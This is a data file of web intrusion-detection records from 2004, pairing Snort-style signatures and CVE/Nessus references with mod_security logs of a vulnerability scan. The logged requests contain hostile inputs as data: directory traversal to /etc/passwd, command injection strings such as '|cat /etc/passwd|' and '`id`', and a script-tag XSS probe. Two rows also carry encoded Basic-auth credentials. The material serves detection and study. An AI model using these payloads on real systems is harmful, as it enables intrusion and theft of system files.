1517	CVE-1999-0947 Nessus 10016	web-application-activity	WEB-CGI envout.bat access	Request: 217.160.165.173 - - [Fri Mar 12 22:37:38 2004] "GET /ssi/envout.bat?\|type%20c:\winnt\win.ini HTTP/1.1" 404 294 Handler: (null) Error: mod_security: Warning. Pattern match "/envout\.bat" at THE_REQUEST. ---------------------------------------- GET /ssi/envout.bat?\|type%20c:\winnt\win.ini HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "\.bat\?" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=94 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1518		web-application-activity	WEB-MISC nstelemetry.adp access	Request: 217.160.165.173 - - [Fri Mar 12 22:31:41 2004] "GET /nstelemetry.adp HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/nstelemetry.adp] for 50000 ms ---------------------------------------- GET /nstelemetry.adp HTTP/1.0 Authorization: Basic bnNhZG1pbjp4 mod_security-message: Access denied with code 200. Pattern match "Basic" at HEADER. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
1520	apache	web-application-activity	WEB-MISC server-info access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:08 2004] "GET /server-info HTTP/1.1" 404 291 Handler: (null) Error: mod_security: Warning. Pattern match "/server-info" at THE_REQUEST. ---------------------------------------- GET /server-info HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/server-info" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1521	apache	web-application-activity	WEB-MISC server-status access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:24 2004] "GET /server-status HTTP/1.1" 403 297 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/server-status ---------------------------------------- GET /server-status HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1525	CAN-2000-0191	web-application-activity	WEB-MISC Axis Storpoint CD access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:57 2004] "GET /config/html/cnf_gi.htm HTTP/1.1" 404 302 Handler: (null) Error: mod_security: Warning. Pattern match "/config/html/cnf_gi\.htm" at THE_REQUEST. ---------------------------------------- GET /config/html/cnf_gi.htm HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/config/html/cnf_gi\.htm" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1526	CAN-2001-1044 Nessus 10601	web-application-activity	WEB-MISC basilix sendmail.inc access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:01 2004] "GET /inc/sendmail.inc HTTP/1.1" 404 296 Handler: (null) Error: mod_security: Warning. Pattern match "/inc/sendmail\.inc" at THE_REQUEST. ---------------------------------------- GET /inc/sendmail.inc HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/inc/sendmail\.inc" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1527	CAN-2001-1044 Nessus 10601	web-application-activity	WEB-MISC basilix mysql.class access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:01 2004] "GET /class/mysql.class HTTP/1.1" 404 297 Handler: (null) Error: mod_security: Warning. Pattern match "/class/mysql\.class" at THE_REQUEST. ---------------------------------------- GET /class/mysql.class HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/class/mysql\.class" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1528	CAN-2000-0629 Nessus 10507	web-application-activity	WEB-MISC BBoard access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:49 2004] "GET /servlet/sunexamples.BBoardServlet HTTP/1.1" 404 313 Handler: (null) Error: mod_security: Warning. Pattern match "/servlet/sunexamples\.BBoardServlet" at THE_REQUEST. ---------------------------------------- GET /servlet/sunexamples.BBoardServlet HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/servlet/sunexamples\.BBoardServlet" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1531	BID142 CAN-1999-1462 Nessus 10025	web-application-attack	WEB-CGI bb-hist.sh attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:42:23 2004] "GET /cgi-bin/bb-hist.sh?HISTFILE=../../../../../etc/passwd HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/bb-hist.sh ---------------------------------------- GET /cgi-bin/bb-hist.sh?HISTFILE=../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1533	CVE-2000-0638 Nessus 10460	web-application-activity	WEB-CGI bb-hostscv.sh access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:26 2004] "GET /bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd HTTP/1.1" 403 297 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/bb-hostsvc.sh ---------------------------------------- GET /bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1534	BID3976 CAN-2001-1199 Nessus 10836	web-application-attack	WEB-CGI agora.cgi attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:46:43 2004] "GET /store/agora.cgi?cart_id=<SCRIPT>alert(document.domain)</SCRIPT>&xm=on&product=HTML HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/store/agora.cgi] for 50000 ms ---------------------------------------- GET /store/agora.cgi?cart_id=<SCRIPT>alert(document.domain)</SCRIPT>&xm=on&product=HTML HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "<[[:space:]]script" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1535	BID1104 CAN-2000-0287	web-application-activity	WEB-CGI bizdbsearch access	Request: 217.160.165.173 - - [Fri Mar 12 22:41:58 2004] "GET /cgi-bin/bizdb1-search.cgi HTTP/1.1" 404 305 Handler: cgi-script Error: mod_security: Warning. Pattern match "/bizdb1-search\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/bizdb1-search.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/bizdb1-search\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1537	CVE-2000-0432	web-application-activity	WEB-CGI calendar_admin.pl access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:01 2004] "GET /cgi-bin/calendar_admin.pl?config=\|cat%20/etc/passwd\| HTTP/1.1" 403 309 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/calendar_admin.pl ---------------------------------------- GET /cgi-bin/calendar_admin.pl?config=\|cat%20/etc/passwd\| HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1539	BID936 CAN-2000-0079	web-application-activity	WEB-CGI /cgi-bin/ls access	Request: 66.230.236.14 - - [Thu Mar 11 07:12:23 2004] "GET http://www.shitforyou.com/cgi-bin/lspro/lspro.cgi?click={TRADE:ID} HTTP/1.1" 302 237 Handler: proxy-server Error: mod_security: Warning. Pattern match "/cgi-bin/ls" at THE_REQUEST. ---------------------------------------- GET http://www.shitforyou.com/cgi-bin/lspro/lspro.cgi?click={TRADE:ID} HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate Accept-Language: en Host: www.shitforyou.com Pragma: no-cache Referer: http://pissing.around-you.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) mod_security-message: Warning. Pattern match "/cgi-bin/ls" at THE_REQUEST. HTTP/1.1 302 Found Location: http://www.shitforyou.com/topsites/index.html Content-Type: text/html; charset=iso-8859-1 X-Cache: MISS from www.testproxy.net Transfer-Encoding: chunked
1540		web-application-activity	WEB-COLDFUSION ?Mode=debug attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:38:01 2004] "GET /?Mode=debug HTTP/1.1" 200 4320 Handler: (null) Error: mod_security: Warning. Pattern match "Mode=debug" at THE_REQUEST. ---------------------------------------- GET /?Mode=debug HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "Mode=debug" at THE_REQUEST. HTTP/1.1 200 OK Warning: Subject to Monitoring Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html
1542	CVE-2000-0726	web-application-activity	WEB-CGI cgimail access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:47 2004] "GET /cgi-bin/cgimail.exe HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/cgimail.exe ---------------------------------------- GET /cgi-bin/cgimail.exe HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1543	CVE-2001-0987 CVE-2000-0431 CVE-1999-1530 Nessus 10041	web-application-activity	WEB-CGI cgiwrap access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:52 2004] "GET /cgi-bin/cgiwrap HTTP/1.1" 404 295 Handler: cgi-script Error: mod_security: Warning. Pattern match "/cgiwrap" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/cgiwrap HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/cgiwrap" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1544	CAN-2000-0945	web-application-activity	WEB-MISC Cisco Catalyst command execution attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:30:27 2004] "GET /exec/show/config/cr HTTP/1.1" 403 303 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/exec ---------------------------------------- GET /exec/show/config/cr HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1547	CAN-2002-0495 Nessus 10924 BID4368	web-application-attack	WEB-CGI csSearch.cgi arbitrary command execution attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:42:48 2004] "GET /cgi-bin/csSearch.cgi?command=savesetup&setup=print%20`id` HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/csSearch.cgi ---------------------------------------- GET /cgi-bin/csSearch.cgi?command=savesetup&setup=print%20`id` HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1551		web-application-activity	WEB-MISC /CVS/Entries access	Request: 217.160.165.173 - - [Fri Mar 12 22:30:22 2004] "GET /CVS/Entries HTTP/1.1" 404 291 Handler: (null) Error: mod_security: Warning. Pattern match "/CVS/Entries" at THE_REQUEST. ---------------------------------------- GET /CVS/Entries HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/CVS/Entries" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1553	CVE-2000-0252	web-application-activity	WEB-CGI /cart/cart.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:43:04 2004] "GET /cart/cart.cgi HTTP/1.1" 404 293 Handler: (null) Error: mod_security: Warning. Pattern match "/cart/cart\.cgi" at THE_REQUEST. ---------------------------------------- GET /cart/cart.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/cart\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1554	Nessus 10403 CVE-2000-0381	web-application-activity	WEB-CGI dbman db.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:30:35 2004] "GET /scripts/dbman/db.cgi?db=no-db HTTP/1.1" 404 300 Handler: (null) Error: mod_security: Warning. Pattern match "/dbman/db\.cgi" at THE_REQUEST. ---------------------------------------- GET /scripts/dbman/db.cgi?db=no-db HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/dbman/db\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1555	CAN-2001-0821	web-application-activity	WEB-CGI DCShop access	Request: 217.160.165.173 - - [Fri Mar 12 22:36:50 2004] "GET /cgi-bin/dcshop.pl HTTP/1.1" 404 297 Handler: cgi-script Error: mod_security: Warning. Pattern match "/dcshop" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/dcshop.pl HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/dcshop" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1560	BID318 CVE-1999-0678	web-application-activity	WEB-MISC /doc/ access	Request: 195.161.118.212 - - [Thu Mar 11 11:41:05 2004] "GET http://top.list.ru/counter?id=651568;t=70;js=13;r=http%3A//1ps.ru/pr/doc/cost.php%20;j=true;s=1024768;d=32;rand=0.939666307230189 HTTP/1.1" 200 887 Handler: proxy-server Error: mod_security: Warning. Pattern match "/doc/" at THE_REQUEST. ---------------------------------------- GET http://top.list.ru/counter?id=651568;t=70;js=13;r=http%3A//1ps.ru/pr/doc/cost.php%20;j=true;s=1024768;d=32;rand=0.939666307230189 HTTP/1.1 Connection: close Cookie: VID=0xh0if1IiiW1 Cookie2: $Version="1" Host: top.list.ru Referer: http://www.handwatch.ru User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; w20010828) mod_security-message: Warning. Pattern match "/doc/" at THE_REQUEST. HTTP/1.1 200 OK Content-Type: image/gif Accept-Ranges: bytes Content-Length: 887 Expires: Thu, 11 Dec 2003 21:00:00 GMT Pragma: no-cache Cache-control: no-cache X-Cache: MISS from www.testproxy.net Connection: close
1561		web-application-activity	WEB-MISC ?open access	Request: 218.22.141.172 - - [Sat Mar 13 11:32:52 2004] "GET http://estore.sjf.com/sjf.nsf/homepage?openform&amp;amp;GTSE=bfox&amp;amp;GTKW=%keyword% HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: Invalid URL encoding #2 detected. ---------------------------------------- GET http://estore.sjf.com/sjf.nsf/homepage?openform&amp;amp;GTSE=bfox&amp;amp;GTKW=%keyword% HTTP/1.0 Accept: text/html, image/jpeg, image/gif, image/x-xbitmap, / Accept-Language: fr Cookie: PPC20=abee7fa35819f0c216d8fc95c0162a1c; path=/PPC_USER_ID=73122a3500ef8a71139332c013bda500; expires=Fri, 01-Jan-10 08:00:00 GMT Host: estore.sjf.com Pragma: no-cache Referer: http://www.paid2find.com//search.php?format=HTML&affiliateID=181&str=industrial%2Bequipment User-Agent: Mozilla/4.0 (compatible; MSIE 5.01 Windows NT 5.1) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
1564	CAN-1999-1533	web-application-activity	WEB-MISC login.htm access	Request: 68.82.168.149 - - [Thu Mar 11 21:26:36 2004] "GET http://www.jj1.com/login.html HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://www.jj1.com/login.html] for 50000 ms ---------------------------------------- GET http://www.jj1.com/login.html HTTP/1.0 Accept: / Accept-Language: en-us,en;q=0.5 Authorization: Basic amR1YmkzMTpzYW11cmFp Host: www.jj1.com Pragma: no-cache Referer: http://www.jj1.com/login.html User-Agent: Mozilla/4.0 ( compatible; MSIE 5.5; Windows XP; DigiExt ) mod_security-message: Access denied with code 200. Pattern match "Basic" at HEADER. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1
1566	CAN-2001-1014	web-application-activity	WEB-CGI eshop.pl access	Request: 217.160.165.173 - - [Fri Mar 12 22:39:49 2004] "GET /cgi-local/eshop.pl/seite=;cat%20eshop.pl\| HTTP/1.1" 404 319 Handler: (null) Error: mod_security: Warning. Pattern match "/eshop\.pl" at THE_REQUEST. ---------------------------------------- GET /cgi-local/eshop.pl/seite=;cat%20eshop.pl\| HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/eshop\.pl" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1570		web-application-activity	WEB-CGI loadpage.cgi access	Request: 217.160.165.173 - - [Fri Mar 12 22:42:42 2004] "GET /cgi-bin/loadpage.cgi HTTP/1.1" 404 300 Handler: cgi-script Error: mod_security: Warning. Pattern match "/loadpage\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/loadpage.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/loadpage\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1571	CAN-2001-0436	web-application-attack	WEB-CGI dcforum.cgi directory traversal attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:37:13 2004] "GET /dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: (null) Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /dcforum/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1572	CAN-2001-0210 BID2361 Nessus 10612	attempted-recon	WEB-CGI commerce.cgi arbitrary file access attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:39:02 2004] "GET /cgi-bin/commerce.cgi?page=../../../../../etc/passwd%00index.html HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/commerce.cgi ---------------------------------------- GET /cgi-bin/commerce.cgi?page=../../../../../etc/passwd%00index.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1573	CVE-2000-1171 BID1963 Nessus 10552	web-application-attack	WEB-CGI cgiforum.pl attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:41:39 2004] "GET /cgi-bin/cgiforum.pl?thesection=../../../../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/cgiforum.pl?thesection=../../../../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1574	CAN-2001-0780	web-application-attack	WEB-CGI directorypro.cgi attempt	Request: 217.160.165.173 - - [Fri Mar 12 22:37:07 2004] "GET /cgi-bin/directorypro.cgi?want=showcat&show=../../../../../etc/passwd%00 HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/directorypro.cgi?want=showcat&show=../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1575		attempted-recon	WEB-MISC Domino mab.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:16 2004] "GET /mab.nsf HTTP/1.1" 403 291 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/mab.nsf ---------------------------------------- GET /mab.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=83 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1576		attempted-recon	WEB-MISC Domino cersvr.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:16 2004] "GET /cersvr.nsf HTTP/1.1" 403 294 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/cersvr.nsf ---------------------------------------- GET /cersvr.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=87 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
1577		attempted-recon	WEB-MISC Domino setup.nsf access	Request: 217.160.165.173 - - [Fri Mar 12 22:38:14 2004] "GET /setup.nsf HTTP/1.1" 403 293 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/setup.nsf ---------------------------------------- GET /setup.nsf HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, / Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1
